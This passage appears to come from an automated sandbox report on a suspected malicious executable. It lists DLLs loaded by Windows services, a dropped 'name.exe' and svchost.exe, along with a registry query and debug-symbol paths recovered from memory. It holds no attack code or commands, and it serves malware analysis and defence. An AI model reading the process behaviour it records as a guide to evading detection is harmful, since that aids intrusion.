              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\AppVClient.exeSection loaded: appvpolicy.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: wtsapi32.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: netapi32.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: samcli.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: logoncli.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: appmanagementconfiguration.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: version.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: tapi32.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: credui.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxstiff.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxsresm.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: ualapi.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dbghelp.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: winhttp.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: mpr.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: secur32.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: sspicli.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dnsapi.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: ntmarta.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: drprov.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: winsta.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: ntlanman.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: davclnt.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: davhlpr.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: wkscli.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: cscapi.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: netutils.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: browcli.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: version.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: msasn1.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: winhttp.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: mpr.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: secur32.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: sspicli.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: dnsapi.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: ntmarta.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: msdtctm.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcprx.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: msdtclog.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: winmm.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: xolehlp.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: ktmw32.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: comres.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcvsp1res.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: mtxoci.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: oci.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: cscapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: drprov.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: ntlanman.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: davclnt.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: davhlpr.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: browcli.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rstrtmgr.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: tyRPPK48Mk.exeStatic file information: File size 3101805 > 1048576
              Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: svchost.exe, 00000006.00000003.2475292212.0000000004C30000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: svchost.exe, 00000006.00000003.2571026895.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2552676258.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2555692425.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msiexec.pdb source: svchost.exe, 00000006.00000003.1940200063.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: svchost.exe, 00000006.00000003.1848418445.0000000005560000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: svchost.exe, 00000006.00000003.2166044684.0000000004C90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ssh-agent.pdb source: svchost.exe, 00000006.00000003.2024944125.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: svchost.exe, 00000006.00000003.2309255812.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: svchost.exe, 00000006.00000003.2113410162.0000000003083000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: svchost.exe, 00000006.00000003.2309255812.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msiexec.pdbGCTL source: svchost.exe, 00000006.00000003.1940200063.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ADelRCP_Exec.pdb source: svchost.exe, 00000006.00000003.2329602484.0000000004B90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mavinject32.pdbGCTL source: svchost.exe, 00000006.00000003.2631630815.00000000054F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2637810667.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PresentationFontCache.pdb source: svchost.exe, 00000006.00000003.1892510705.0000000005750000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3178209395.0000000001470000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerceptionSimulationService.pdb source: svchost.exe, 00000006.00000003.1951393165.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: name.exe, 00000001.00000003.1802681812.0000000005030000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000001.00000003.1802504246.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000003.00000003.1821978946.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000003.00000003.1818359606.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.1837727518.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.1840416756.0000000005860000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: svchost.exe, 00000006.00000003.2278103872.0000000004B90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: MsSense.pdbGCTL source: svchost.exe, 00000006.00000003.1990664261.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: MsSense.pdb source: svchost.exe, 00000006.00000003.1990664261.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: svchost.exe, 00000006.00000003.2608906582.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: svchost.exe, 00000006.00000003.2482581363.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2496506784.0000000004B80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: WmiApSrv.pdbGCTL source: svchost.exe, 00000006.00000003.2075539957.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: svchost.exe, 00000006.00000003.2362639087.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Acrobat_SL.pdb((( source: svchost.exe, 00000006.00000003.2178027420.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: locator.pdb source: svchost.exe, 00000006.00000003.1987958380.00000000054F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1978746407.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: svchost.exe, 00000006.00000003.1876194254.00000000056D0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ADelRCP_Exec.pdbCC9 source: svchost.exe, 00000006.00000003.2329602484.0000000004B90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: svchost.exe, 00000006.00000003.2193636183.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Acrobat_SL.pdb source: svchost.exe, 00000006.00000003.2178027420.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: svchost.exe, 00000006.00000003.2571026895.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2552676258.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2555692425.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: svchost.exe, 00000006.00000003.2278103872.0000000004B90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: svchost.exe, 00000006.00000003.2385840703.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: svchost.exe, 00000006.00000003.2166044684.0000000004C90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mavinject32.pdb source: svchost.exe, 00000006.00000003.2631630815.00000000054F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2637810667.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: maintenanceservice.pdb source: svchost.exe, 00000006.00000003.1919148439.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerceptionSimulationService.pdbGCTL source: svchost.exe, 00000006.00000003.1951393165.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msdtcexe.pdbGCTL source: svchost.exe, 00000006.00000003.1931405560.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: 64BitMAPIBroker.pdb source: svchost.exe, 00000006.00000003.2453584126.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: snmptrap.pdbGCTL source: svchost.exe, 00000006.00000003.2004063369.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerfHost.pdbGCTL source: svchost.exe, 00000006.00000003.1964254852.0000000005720000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1975873172.00000000054F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1966295550.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: svchost.exe, 00000006.00000003.2608906582.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: svchost.exe, 00000006.00000003.2432675812.0000000004C30000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: svchost.exe, 00000006.00000003.2362639087.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: svchost.exe, 00000006.00000003.2475292212.0000000004C30000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerfHost.pdb source: svchost.exe, 00000006.00000003.1964254852.0000000005720000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1975873172.00000000054F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1966295550.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: svchost.exe, 00000006.00000003.2385840703.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp
